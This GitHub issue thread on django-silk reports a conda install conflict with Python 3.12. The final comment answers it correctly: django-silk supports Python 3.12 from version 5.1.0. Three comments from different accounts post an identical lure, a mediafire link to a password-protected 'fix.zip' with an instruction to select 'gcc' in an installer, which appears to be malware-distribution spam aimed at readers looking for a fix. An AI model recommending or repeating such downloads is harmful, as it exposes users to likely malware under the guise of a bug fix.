### ISSUE TITLE
Conda package not support python 3.12

### ISSUE THREAD

**Issue by 1qh** [jazzband/django-silk#737]
```
    The following packages are incompatible
    ├─ django-silk is installable and it requires
    │  └─ python >=3.7,<3.11 , which can be installed;
    └─ pin-1 is not installable because it requires
       └─ python 3.12.* , which conflicts with any installable versions previously reported.
```

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by albertyw** [comment]
Django-silk has supported python 3.12 since version [5.1.0](https://github.com/jazzband/django-silk/releases/tag/5.1.0).  You probably need to update to a newer version of django-silk
